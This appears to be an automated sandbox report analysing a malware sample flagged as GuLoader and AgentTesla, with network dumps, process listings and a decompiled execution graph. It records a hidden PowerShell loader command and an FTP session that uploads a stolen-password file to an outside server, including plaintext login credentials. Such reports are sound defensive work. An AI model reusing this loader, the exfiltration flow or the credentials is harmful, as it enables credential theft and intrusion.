                                                2024-10-03 08:51:39 UTC8000INData Raw: 4b 79 cc 29 ca 27 d2 3b 75 7f 63 c6 64 83 9b 4b 57 2f ef 9a 6d e0 f1 be c6 82 d4 2a 6a d8 e3 16 d0 59 00 ad 50 05 7b 1e a4 17 c1 83 10 95 cc 95 d3 f3 98 ab f0 1f a6 25 42 1c 35 1e 64 b1 cb d0 57 54 5e 9f 0c aa ff 69 33 d0 1d 35 bb e9 c8 82 8c d8 7c 97 bd ff cf 97 03 91 1b 37 f2 8b 7e 2d d2 62 52 ba c4 4f e6 51 78 e5 7d cd 7f 48 b6 46 b2 9b 31 2c c3 f0 5e c2 a3 8a b5 4a f6 ce 9d f0 e7 24 75 b7 b7 7f 91 90 55 58 92 fc 2e 33 4e 50 70 9d 41 18 a6 c6 cc 8d 69 84 98 41 d0 11 c7 8b 83 6c 6c e0 d0 dd a9 61 7c 74 25 db 70 45 43 b2 3c f5 e0 42 a4 9b d5 b8 ac dc 61 73 d2 4d 0a fc dd b4 8f 31 e1 47 c3 a4 00 8d 57 86 d9 81 e2 b9 03 4b 7d 46 a5 e0 28 b2 e7 7e 90 63 ce 52 cb e8 99 19 c7 86 02 92 54 a6 98 ce a5 da 40 88 c1 27 64 54 a7 2b 42 3f fe c7 70 02 8e 9c e9 da da
                                                Data Ascii: Ky)';ucdKW/m*jYP{%B5dWT^i35|7~-bROQx}HF1,^J$uUX.3NPpAiAlla|t%pEC<BasM1GWK}F(~cRT@'dT+B?p
                                                2024-10-03 08:51:39 UTC8000INData Raw: 5c d6 a2 5e e6 51 da 25 e9 10 8c 49 38 88 61 77 5f 56 75 ae 26 aa 2e 8a de d5 67 f7 c0 36 65 38 a4 a2 e4 bd 6e 5f 9c 5a b8 e2 2b f2 e4 b9 52 95 fb 83 e2 be 47 33 b4 52 d5 e4 65 45 10 88 df 17 7c ed ad af fa 4a 1e 52 04 c0 6c f6 0c bf 8b ae 3e ba be 13 89 bc 11 6c 1b 54 12 81 49 56 3f 91 f7 8b e0 4d 0a 1d 18 19 9a 73 6c d4 2d ad 8a ed a2 ef d5 5f 67 c4 4b 8d 9a 02 cb 07 d8 3b 49 72 9d c8 6b 7d 97 b5 5b de e1 a1 69 3d 95 b8 38 83 9e a5 6a d8 e9 16 d2 5b 00 73 5d 00 7b 71 72 06 dc 89 9e b3 ed 95 eb c5 ea e3 ef e1 db 11 58 34 9c 14 c6 9b 30 de 5e 54 5e 9d 0a aa 8d 13 14 df 6d 3d b2 e9 c8 88 5a c2 45 b2 b7 c6 d8 69 0f 95 e5 49 5c 94 80 51 a9 de 3f 3e 9f 6f 96 79 62 e5 55 38 11 e7 b0 b8 b6 60 3c 10 d7 d8 f0 c2 5d 8e 80 fc 09 cf 6e 22 f7 04 65 b7 49 72 73 91 92
                                                Data Ascii: \^Q%I8aw_Vu&.g6e8n_Z+RG3ReE|JRl>lTIV?Msl-_gK;Irk}[i=8j[s]{qrX40^T^m=ZEiI\Q?>oybU8`<]n"eIrs
                                                2024-10-03 08:51:39 UTC8000INData Raw: d5 f2 29 72 cb b0 ed a3 b0 2b 40 91 26 63 d9 3f 71 f9 d0 9f 65 7e cd f6 9f 1b 65 f9 db c7 81 cb 84 ac b3 3e 3a 29 fe 68 7e 17 a9 44 57 97 37 69 37 50 02 b8 8c 52 00 17 2a e6 4d e0 80 82 2b 42 3d ac 7c 53 02 6b ca 19 3b 6f cf e2 05 87 cf 46 ed f5 39 7c 5c 59 da fd d4 82 8a d0 7d cb 94 5c 31 3d 56 54 e9 6d 7a e6 94 f7 7e a0 fd c1 23 32 de fc 15 c5 5c 1c 5b a4 27 a4 cc 21 c5 91 f2 10 8a bd 1e 25 61 89 59 6b 69 50 2a ac d0 f4 d1 fa 99 8b a8 aa 16 ec 88 5c 9a 9c 74 77 ad 50 90 42 d5 fe eb d6 0b 99 f2 89 34 27 40 33 cc 8a f2 e6 15 93 06 8b df 72 86 49 ad a9 9f 3b 02 52 0e 3e 9c f0 0a 41 79 a3 39 c9 a0 34 a2 ba 9f 4a 0a 54 ec 87 6a fc 4d 3a d3 e4 37 22 65 16 e6 13 61 7f 08 e4 d3 a1 88 13 c1 98 d4 30 51 3a 47 8c c2 dc c6 0d d8 54 06 7e 9d ce 95 8f 90 b5 a5 2c e8
                                                Data Ascii: )r+@&c?qe~e>:)h~DW7i7PR*M+B=|Sk;oF9|\Y}\1=VTmz~#2\['!%aYkiP*\twPB4'@3rI;R>Ay94JTjM:7"ea0Q:GT~,


                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                Oct 3, 2024 10:51:42.436698914 CEST2149737185.146.87.128192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 14 of 50 allowed.
                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 14 of 50 allowed.220-Local time is now 11:51. Server port: 21.
                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 14 of 50 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login
                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 14 of 50 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 14 of 50 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                Oct 3, 2024 10:51:42.436996937 CEST4973721192.168.2.4185.146.87.128USER AdminFTP@rusticpensiune.ro
                                                Oct 3, 2024 10:51:42.653009892 CEST2149737185.146.87.128192.168.2.4331 User AdminFTP@rusticpensiune.ro OK. Password required
                                                Oct 3, 2024 10:51:42.653280020 CEST4973721192.168.2.4185.146.87.128PASS hr,d@KUwa5llI%*RNL^J]g%8I;!;_Ne#G1h~lE!*86DAAD6#iLm$x)r+e1z$p+_Q,4_(f!};B?vD!IG?NqT[zOHNr6_nww[S]V?MlcYSt_QO
                                                Oct 3, 2024 10:51:42.915069103 CEST2149737185.146.87.128192.168.2.4230 OK. Current restricted directory is /
                                                Oct 3, 2024 10:51:43.133241892 CEST2149737185.146.87.128192.168.2.4504 Unknown command
                                                Oct 3, 2024 10:51:43.137435913 CEST4973721192.168.2.4185.146.87.128PWD
                                                Oct 3, 2024 10:51:43.353231907 CEST2149737185.146.87.128192.168.2.4257 "/" is your current location
                                                Oct 3, 2024 10:51:43.355113029 CEST4973721192.168.2.4185.146.87.128TYPE I
                                                Oct 3, 2024 10:51:43.571044922 CEST2149737185.146.87.128192.168.2.4200 TYPE is now 8-bit binary
                                                Oct 3, 2024 10:51:43.571270943 CEST4973721192.168.2.4185.146.87.128PASV
                                                Oct 3, 2024 10:51:43.831985950 CEST2149737185.146.87.128192.168.2.4227 Entering Passive Mode (185,146,87,128,193,135)
                                                Oct 3, 2024 10:51:43.838009119 CEST4973721192.168.2.4185.146.87.128STOR PW_user-965969_2024_10_03_04_51_40.html
                                                Oct 3, 2024 10:51:44.445097923 CEST2149737185.146.87.128192.168.2.4150 Accepted data connection
                                                Oct 3, 2024 10:51:44.662170887 CEST2149737185.146.87.128192.168.2.4226-File successfully transferred
                                                226-File successfully transferred226 0.223 seconds (measured here), 1.40 Kbytes per second

                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:04:50:57
                                                Start date:03/10/2024
                                                Path:C:\Users\user\Desktop\24100311.EXE.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\24100311.EXE.exe"
                                                Imagebase:0x400000
                                                File size:1'029'176 bytes
                                                MD5 hash:36C593A2CEB2680510F2094CD6E4010D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:1
                                                Start time:04:50:58
                                                Start date:03/10/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Forglemmelser=Get-Content -Raw 'C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing\Independable.Ovi';$Fellifluous=$Forglemmelser.SubString(7655,3);.$Fellifluous($Forglemmelser)"
                                                Imagebase:0xc30000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2049174087.000000000A206000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                Target ID:2
                                                Start time:04:50:58
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:6
                                                Start time:04:51:34
                                                Start date:03/10/2024
                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\syswow64\msiexec.exe"
                                                Imagebase:0x7c0000
                                                File size:59'904 bytes
                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2947539010.0000000021FB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2947539010.0000000021FB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2947539010.0000000021FF7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:23.4%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:16.7%
                                                  Total number of Nodes:1396
                                                  Total number of Limit Nodes:34
                                                  execution_graph 3223 4015c1 3243 402d3e 3223->3243 3227 401631 3228 401663 3227->3228 3229 401636 3227->3229 3233 401423 24 API calls 3228->3233 3259 401423 3229->3259 3240 40165b 3233->3240 3237 40164a SetCurrentDirectoryW 3237->3240 3238 4015d1 3238->3227 3239 4015fa 3238->3239 3241 401617 GetFileAttributesW 3238->3241 3255 405e3e 3238->3255 3263 405b0d 3238->3263 3271 405af0 CreateDirectoryW 3238->3271 3239->3238 3266 405a73 CreateDirectoryW 3239->3266 3241->3238 3244 402d4a 3243->3244 3274 406579 3244->3274 3247 4015c8 3249 405ebc CharNextW CharNextW 3247->3249 3250 405ed9 3249->3250 3253 405eeb 3249->3253 3252 405ee6 CharNextW 3250->3252 3250->3253 3251 405f0f 3251->3238 3252->3251 3253->3251 3254 405e3e CharNextW 3253->3254 3254->3253 3256 405e44 3255->3256 3257 405e5a 3256->3257 3258 405e4b CharNextW 3256->3258 3257->3238 3258->3256 3312 4055a4 3259->3312 3262 40653c lstrcpynW 3262->3237 3323 406931 GetModuleHandleA 3263->3323 3267 405ac4 GetLastError 3266->3267 3268 405ac0 3266->3268 3267->3268 3269 405ad3 SetFileSecurityW 3267->3269 3268->3239 3269->3268 3270 405ae9 GetLastError 3269->3270 3270->3268 3272 405b00 3271->3272 3273 405b04 GetLastError 3271->3273 3272->3238 3273->3272 3278 406586 3274->3278 3275 4067d1 3276 402d6b 3275->3276 3307 40653c lstrcpynW 3275->3307 3276->3247 3291 4067eb 3276->3291 3278->3275 3279 40679f lstrlenW 3278->3279 3281 406579 10 API calls 3278->3281 3284 4066b4 GetSystemDirectoryW 3278->3284 3285 4066c7 GetWindowsDirectoryW 3278->3285 3286 4067eb 5 API calls 3278->3286 3287 406579 10 API calls 3278->3287 3288 406742 lstrcatW 3278->3288 3289 4066fb SHGetSpecialFolderLocation 3278->3289 3300 40640a 3278->3300 3305 406483 wsprintfW 3278->3305 3306 40653c lstrcpynW 3278->3306 3279->3278 3281->3279 3284->3278 3285->3278 3286->3278 3287->3278 3288->3278 3289->3278 3290 406713 SHGetPathFromIDListW CoTaskMemFree 3289->3290 3290->3278 3298 4067f8 3291->3298 3292 40686e 3293 406873 CharPrevW 3292->3293 3295 406894 3292->3295 3293->3292 3294 406861 CharNextW 3294->3292 3294->3298 3295->3247 3296 405e3e CharNextW 3296->3298 3297 40684d CharNextW 3297->3298 3298->3292 3298->3294 3298->3296 3298->3297 3299 40685c CharNextW 3298->3299 3299->3294 3308 4063a9 3300->3308 3303 40643e RegQueryValueExW RegCloseKey 3304 40646e 3303->3304 3304->3278 3305->3278 3306->3278 3307->3276 3309 4063b8 3308->3309 3310 4063c1 RegOpenKeyExW 3309->3310 3311 4063bc 3309->3311 3310->3311 3311->3303 3311->3304 3313 4055bf 3312->3313 3321 401431 3312->3321 3314 4055db lstrlenW 3313->3314 3315 406579 17 API calls 3313->3315 3316 405604 3314->3316 3317 4055e9 lstrlenW 3314->3317 3315->3314 3318 405617 3316->3318 3319 40560a SetWindowTextW 3316->3319 3320 4055fb lstrcatW 3317->3320 3317->3321 3318->3321 3322 40561d SendMessageW SendMessageW SendMessageW 3318->3322 3319->3318 3320->3316 3321->3262 3322->3321 3324 406957 GetProcAddress 3323->3324 3325 40694d 3323->3325 3326 405b14 3324->3326 3329 4068c1 GetSystemDirectoryW 3325->3329 3326->3238 3328 406953 3328->3324 3328->3326 3330 4068e3 wsprintfW LoadLibraryExW 3329->3330 3330->3328 4161 402a42 4162 402d1c 17 API calls 4161->4162 4163 402a48 4162->4163 4164 402a88 4163->4164 4165 402a6f 4163->4165 4171 402925 4163->4171 4168 402aa2 4164->4168 4169 402a92 4164->4169 4166 402a74 4165->4166 4167 402a85 4165->4167 4175 40653c lstrcpynW 4166->4175 4176 406483 wsprintfW 4167->4176 4172 406579 17 API calls 4168->4172 4170 402d1c 17 API calls 4169->4170 4170->4171 4172->4171 4175->4171 4176->4171 3468 401c43 3469 402d1c 17 API calls 3468->3469 3470 401c4a 3469->3470 3471 402d1c 17 API calls 3470->3471 3472 401c57 3471->3472 3473 401c6c 3472->3473 3475 402d3e 17 API calls 3472->3475 3474 401c7c 3473->3474 3476 402d3e 17 API calls 3473->3476 3477 401cd3 3474->3477 3478 401c87 3474->3478 3475->3473 3476->3474 3480 402d3e 17 API calls 3477->3480 3479 402d1c 17 API calls 3478->3479 3481 401c8c 3479->3481 3482 401cd8 3480->3482 3484 402d1c 17 API calls 3481->3484 3483 402d3e 17 API calls 3482->3483 3485 401ce1 FindWindowExW 3483->3485 3486 401c98 3484->3486 3489 401d03 3485->3489 3487 401cc3 SendMessageW 3486->3487 3488 401ca5 SendMessageTimeoutW 3486->3488 3487->3489 3488->3489 4177 402b43 4178 406931 5 API calls 4177->4178 4179 402b4a 4178->4179 4180 402d3e 17 API calls 4179->4180 4181 402b53 4180->4181 4182 402b57 IIDFromString 4181->4182 4184 402b8e 4181->4184 4183 402b66 4182->4183 4182->4184 4183->4184 4187 40653c lstrcpynW 4183->4187 4186 402b83 CoTaskMemFree 4186->4184 4187->4186 4188 402947 4189 402d3e 17 API calls 4188->4189 4190 402955 4189->4190 4191 40296b 4190->4191 4192 402d3e 17 API calls 4190->4192 4193 40600d 2 API calls 4191->4193 4192->4191 4194 402971 4193->4194 4216 406032 GetFileAttributesW CreateFileW 4194->4216 4196 40297e 4197 402a21 4196->4197 4198 40298a GlobalAlloc 4196->4198 4201 402a29 DeleteFileW 4197->4201 4202 402a3c 4197->4202 4199 4029a3 4198->4199 4200 402a18 CloseHandle 4198->4200 4217 403590 SetFilePointer 4199->4217 4200->4197 4201->4202 4204 4029a9 4205 40357a ReadFile 4204->4205 4206 4029b2 GlobalAlloc 4205->4206 4207 4029c2 4206->4207 4208 4029f6 4206->4208 4209 403309 44 API calls 4207->4209 4210 4060e4 WriteFile 4208->4210 4215 4029cf 4209->4215 4211 402a02 GlobalFree 4210->4211 4212 403309 44 API calls 4211->4212 4213 402a15 4212->4213 4213->4200 4214 4029ed GlobalFree 4214->4208 4215->4214 4216->4196 4217->4204 4218 4045c8 lstrcpynW lstrlenW 4219 403bc9 4220 403bd4 4219->4220 4221 403bd8 4220->4221 4222 403bdb GlobalAlloc 4220->4222 4222->4221 4226 4016cc 4227 402d3e 17 API calls 4226->4227 4228 4016d2 GetFullPathNameW 4227->4228 4229 4016ec 4228->4229 4230 40170e 4228->4230 4229->4230 4233 40689a 2 API calls 4229->4233 4231 402bc2 4230->4231 4232 401723 GetShortPathNameW 4230->4232 4232->4231 4234 4016fe 4233->4234 4234->4230 4236 40653c lstrcpynW 4234->4236 4236->4230 4237 401e4e GetDC 4238 402d1c 17 API calls 4237->4238 4239 401e60 GetDeviceCaps MulDiv ReleaseDC 4238->4239 4240 402d1c 17 API calls 4239->4240 4241 401e91 4240->4241 4242 406579 17 API calls 4241->4242 4243 401ece CreateFontIndirectW 4242->4243 4244 402630 4243->4244 4252 402acf 4253 402d1c 17 API calls 4252->4253 4254 402ad5 4253->4254 4255 402925 4254->4255 4256 402b12 4254->4256 4258 402ae7 4254->4258 4256->4255 4257 406579 17 API calls 4256->4257 4257->4255 4258->4255 4260 406483 wsprintfW 4258->4260 4260->4255 4261 4020d0 4262 4020e2 4261->4262 4272 402194 4261->4272 4263 402d3e 17 API calls 4262->4263 4265 4020e9 4263->4265 4264 401423 24 API calls 4270 4022ee 4264->4270 4266 402d3e 17 API calls 4265->4266 4267 4020f2 4266->4267 4268 402108 LoadLibraryExW 4267->4268 4269 4020fa GetModuleHandleW 4267->4269 4271 402119 4268->4271 4268->4272 4269->4268 4269->4271 4281 4069a0 4271->4281 4272->4264 4275 402163 4277 4055a4 24 API calls 4275->4277 4276 40212a 4278 401423 24 API calls 4276->4278 4279 40213a 4276->4279 4277->4279 4278->4279 4279->4270 4280 402186 FreeLibrary 4279->4280 4280->4270 4286 40655e WideCharToMultiByte 4281->4286 4283 4069bd 4284 4069c4 GetProcAddress 4283->4284 4285 402124 4283->4285 4284->4285 4285->4275 4285->4276 4286->4283 4287 404651 4288 404669 4287->4288 4291 404783 4287->4291 4292 404492 18 API calls 4288->4292 4289 4047ed 4290 4047f7 GetDlgItem 4289->4290 4293 4048b7 4289->4293 4294 404811 4290->4294 4295 404878 4290->4295 4291->4289 4291->4293 4296 4047be GetDlgItem SendMessageW 4291->4296 4297 4046d0 4292->4297 4298 4044f9 8 API calls 4293->4298 4294->4295 4299 404837 SendMessageW LoadCursorW SetCursor 4294->4299 4295->4293 4300 40488a 4295->4300 4320 4044b4 KiUserCallbackDispatcher 4296->4320 4302 404492 18 API calls 4297->4302 4303 4048b2 4298->4303 4324 404900 4299->4324 4305 4048a0 4300->4305 4306 404890 SendMessageW 4300->4306 4308 4046dd CheckDlgButton 4302->4308 4305->4303 4310 4048a6 SendMessageW 4305->4310 4306->4305 4307 4047e8 4321 4048dc 4307->4321 4318 4044b4 KiUserCallbackDispatcher 4308->4318 4310->4303 4313 4046fb GetDlgItem 4319 4044c7 SendMessageW 4313->4319 4315 404711 SendMessageW 4316 404737 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4315->4316 4317 40472e GetSysColor 4315->4317 4316->4303 4317->4316 4318->4313 4319->4315 4320->4307 4322 4048ea 4321->4322 4323 4048ef SendMessageW 4321->4323 4322->4323 4323->4289 4327 405b68 ShellExecuteExW 4324->4327 4326 404866 LoadCursorW SetCursor 4326->4295 4327->4326 4328 4028d5 4329 4028dd 4328->4329 4330 4028e1 FindNextFileW 4329->4330 4333 4028f3 4329->4333 4331 40293a 4330->4331 4330->4333 4334 40653c lstrcpynW 4331->4334 4334->4333 4335 401956 4336 402d3e 17 API calls 4335->4336 4337 40195d lstrlenW 4336->4337 4338 402630 4337->4338 4339 4014d7 4340 402d1c 17 API calls 4339->4340 4341 4014dd Sleep 4340->4341 4343 402bc2 4341->4343 3732 4035d8 SetErrorMode GetVersion 3733 403617 3732->3733 3734 40361d 3732->3734 3735 406931 5 API calls 3733->3735 3736 4068c1 3 API calls 3734->3736 3735->3734 3737 403633 lstrlenA 3736->3737 3737->3734 3738 403643 3737->3738 3739 406931 5 API calls 3738->3739 3740 40364a 3739->3740 3741 406931 5 API calls 3740->3741 3742 403651 3741->3742 3743 406931 5 API calls 3742->3743 3744 40365d #17 OleInitialize SHGetFileInfoW 3743->3744 3822 40653c lstrcpynW 3744->3822 3747 4036a9 GetCommandLineW 3823 40653c lstrcpynW 3747->3823 3749 4036bb 3750 405e3e CharNextW 3749->3750 3751 4036e0 CharNextW 3750->3751 3752 40380a GetTempPathW 3751->3752 3760 4036f9 3751->3760 3824 4035a7 3752->3824 3754 403822 3755 403826 GetWindowsDirectoryW lstrcatW 3754->3755 3756 40387c DeleteFileW 3754->3756 3757 4035a7 12 API calls 3755->3757 3834 403068 GetTickCount GetModuleFileNameW 3756->3834 3761 403842 3757->3761 3758 405e3e CharNextW 3758->3760 3760->3758 3767 4037f5 3760->3767 3769 4037f3 3760->3769 3761->3756 3763 403846 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3761->3763 3762 403890 3764 403947 ExitProcess CoUninitialize 3762->3764 3771 405e3e CharNextW 3762->3771 3806 403933 3762->3806 3768 4035a7 12 API calls 3763->3768 3765 403a7d 3764->3765 3766 40395d 3764->3766 3774 403a85 GetCurrentProcess OpenProcessToken 3765->3774 3777 403b01 ExitProcess 3765->3777 3773 405ba2 MessageBoxIndirectW 3766->3773 3920 40653c lstrcpynW 3767->3920 3775 403874 3768->3775 3769->3752 3783 4038af 3771->3783 3779 40396b ExitProcess 3773->3779 3780 403ad1 3774->3780 3781 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 3774->3781 3775->3756 3775->3764 3776 403943 3776->3764 3782 406931 5 API calls 3780->3782 3781->3780 3786 403ad8 3782->3786 3784 403973 3783->3784 3785 40390d 3783->3785 3787 405b0d 5 API calls 3784->3787 3921 405f19 3785->3921 3789 403aed ExitWindowsEx 3786->3789 3790 403afa 3786->3790 3791 403978 lstrcatW 3787->3791 3789->3777 3789->3790 3943 40140b 3790->3943 3794 403994 lstrcatW lstrcmpiW 3791->3794 3795 403989 lstrcatW 3791->3795 3794->3764 3796 4039b0 3794->3796 3795->3794 3798 4039b5 3796->3798 3799 4039bc 3796->3799 3802 405a73 4 API calls 3798->3802 3801 405af0 2 API calls 3799->3801 3800 403928 3936 40653c lstrcpynW 3800->3936 3804 4039c1 SetCurrentDirectoryW 3801->3804 3805 4039ba 3802->3805 3807 4039d1 3804->3807 3808 4039dc 3804->3808 3805->3804 3864 403c0b 3806->3864 3937 40653c lstrcpynW 3807->3937 3938 40653c lstrcpynW 3808->3938 3811 406579 17 API calls 3812 403a1b DeleteFileW 3811->3812 3813 403a28 CopyFileW 3812->3813 3819 4039ea 3812->3819 3813->3819 3814 403a71 3815 406302 36 API calls 3814->3815 3817 403a78 3815->3817 3817->3764 3818 406579 17 API calls 3818->3819 3819->3811 3819->3814 3819->3818 3820 405b25 2 API calls 3819->3820 3821 403a5c CloseHandle 3819->3821 3939 406302 MoveFileExW 3819->3939 3820->3819 3821->3819 3822->3747 3823->3749 3825 4067eb 5 API calls 3824->3825 3826 4035b3 3825->3826 3827 4035bd 3826->3827 3828 405e11 3 API calls 3826->3828 3827->3754 3829 4035c5 3828->3829 3830 405af0 2 API calls 3829->3830 3831 4035cb 3830->3831 3946 406061 3831->3946 3950 406032 GetFileAttributesW CreateFileW 3834->3950 3836 4030ab 3863 4030b8 3836->3863 3951 40653c lstrcpynW 3836->3951 3838 4030ce 3952 405e5d lstrlenW 3838->3952 3842 4030df GetFileSize 3843 4030f6 3842->3843 3858 4031d9 3842->3858 3846 40357a ReadFile 3843->3846 3850 403276 3843->3850 3857 402fc6 32 API calls 3843->3857 3843->3858 3843->3863 3844 402fc6 32 API calls 3845 4031e2 3844->3845 3847 40321e GlobalAlloc 3845->3847 3845->3863 3958 403590 SetFilePointer 3845->3958 3846->3843 3848 403235 3847->3848 3853 406061 2 API calls 3848->3853 3851 402fc6 32 API calls 3850->3851 3851->3863 3852 4031ff 3854 40357a ReadFile 3852->3854 3855 403246 CreateFileW 3853->3855 3856 40320a 3854->3856 3859 403280 3855->3859 3855->3863 3856->3847 3856->3863 3857->3843 3858->3844 3957 403590 SetFilePointer 3859->3957 3861 40328e 3862 403309 44 API calls 3861->3862 3862->3863 3863->3762 3865 406931 5 API calls 3864->3865 3866 403c1f 3865->3866 3867 403c25 3866->3867 3868 403c37 3866->3868 3967 406483 wsprintfW 3867->3967 3869 40640a 3 API calls 3868->3869 3870 403c67 3869->3870 3872 403c86 lstrcatW 3870->3872 3874 40640a 3 API calls 3870->3874 3873 403c35 3872->3873 3959 403ee1 3873->3959 3874->3872 3877 405f19 18 API calls 3878 403cb8 3877->3878 3879 403d4c 3878->3879 3881 40640a 3 API calls 3878->3881 3880 405f19 18 API calls 3879->3880 3882 403d52 3880->3882 3883 403cea 3881->3883 3884 403d62 LoadImageW 3882->3884 3885 406579 17 API calls 3882->3885 3883->3879 3889 403d0b lstrlenW 3883->3889 3893 405e3e CharNextW 3883->3893 3886 403e08 3884->3886 3887 403d89 RegisterClassW 3884->3887 3885->3884 3888 40140b 2 API calls 3886->3888 3890 403e12 3887->3890 3891 403dbf SystemParametersInfoW CreateWindowExW 3887->3891 3892 403e0e 3888->3892 3894 403d19 lstrcmpiW 3889->3894 3895 403d3f 3889->3895 3890->3776 3891->3886 3892->3890 3900 403ee1 18 API calls 3892->3900 3897 403d08 3893->3897 3894->3895 3898 403d29 GetFileAttributesW 3894->3898 3896 405e11 3 API calls 3895->3896 3901 403d45 3896->3901 3897->3889 3899 403d35 3898->3899 3899->3895 3902 405e5d 2 API calls 3899->3902 3903 403e1f 3900->3903 3968 40653c lstrcpynW 3901->3968 3902->3895 3905 403e2b ShowWindow 3903->3905 3906 403eae 3903->3906 3908 4068c1 3 API calls 3905->3908 3907 405677 5 API calls 3906->3907 3909 403eb4 3907->3909 3913 403e43 3908->3913 3910 403ed0 3909->3910 3911 403eb8 3909->3911 3914 40140b 2 API calls 3910->3914 3911->3890 3918 40140b 2 API calls 3911->3918 3912 403e51 GetClassInfoW 3916 403e65 GetClassInfoW RegisterClassW 3912->3916 3917 403e7b DialogBoxParamW 3912->3917 3913->3912 3915 4068c1 3 API calls 3913->3915 3914->3890 3915->3912 3916->3917 3919 40140b 2 API calls 3917->3919 3918->3890 3919->3890 3920->3769 3973 40653c lstrcpynW 3921->3973 3923 405f2a 3924 405ebc 4 API calls 3923->3924 3925 405f30 3924->3925 3926 403919 3925->3926 3927 4067eb 5 API calls 3925->3927 3926->3764 3935 40653c lstrcpynW 3926->3935 3932 405f40 3927->3932 3928 405f71 lstrlenW 3929 405f7c 3928->3929 3928->3932 3931 405e11 3 API calls 3929->3931 3930 40689a 2 API calls 3930->3932 3933 405f81 GetFileAttributesW 3931->3933 3932->3926 3932->3928 3932->3930 3934 405e5d 2 API calls 3932->3934 3933->3926 3934->3928 3935->3800 3936->3806 3937->3808 3938->3819 3940 406316 3939->3940 3942 406323 3939->3942 3974 406188 3940->3974 3942->3819 3944 401389 2 API calls 3943->3944 3945 401420 3944->3945 3945->3777 3947 40606e GetTickCount GetTempFileNameW 3946->3947 3948 4060a4 3947->3948 3949 4035d6 3947->3949 3948->3947 3948->3949 3949->3754 3950->3836 3951->3838 3953 405e6b 3952->3953 3954 405e71 CharPrevW 3953->3954 3955 4030d4 3953->3955 3954->3953 3954->3955 3956 40653c lstrcpynW 3955->3956 3956->3842 3957->3861 3958->3852 3960 403ef5 3959->3960 3969 406483 wsprintfW 3960->3969 3962 403f66 3970 403f9a 3962->3970 3964 403c96 3964->3877 3965 403f6b 3965->3964 3966 406579 17 API calls 3965->3966 3966->3965 3967->3873 3968->3879 3969->3962 3971 406579 17 API calls 3970->3971 3972 403fa8 SetWindowTextW 3971->3972 3972->3965 3973->3923 3975 4061b8 3974->3975 3976 4061de GetShortPathNameW 3974->3976 4001 406032 GetFileAttributesW CreateFileW 3975->4001 3978 4061f3 3976->3978 3979 4062fd 3976->3979 3978->3979 3981 4061fb wsprintfA 3978->3981 3979->3942 3980 4061c2 CloseHandle GetShortPathNameW 3980->3979 3982 4061d6 3980->3982 3983 406579 17 API calls 3981->3983 3982->3976 3982->3979 3984 406223 3983->3984 4002 406032 GetFileAttributesW CreateFileW 3984->4002 3986 406230 3986->3979 3987 40623f GetFileSize GlobalAlloc 3986->3987 3988 406261 3987->3988 3989 4062f6 CloseHandle 3987->3989 3990 4060b5 ReadFile 3988->3990 3989->3979 3991 406269 3990->3991 3991->3989 4003 405f97 lstrlenA 3991->4003 3994 406280 lstrcpyA 3997 4062a2 3994->3997 3995 406294 3996 405f97 4 API calls 3995->3996 3996->3997 3998 4062d9 SetFilePointer 3997->3998 3999 4060e4 WriteFile 3998->3999 4000 4062ef GlobalFree 3999->4000 4000->3989 4001->3980 4002->3986 4004 405fd8 lstrlenA 4003->4004 4005 405fe0 4004->4005 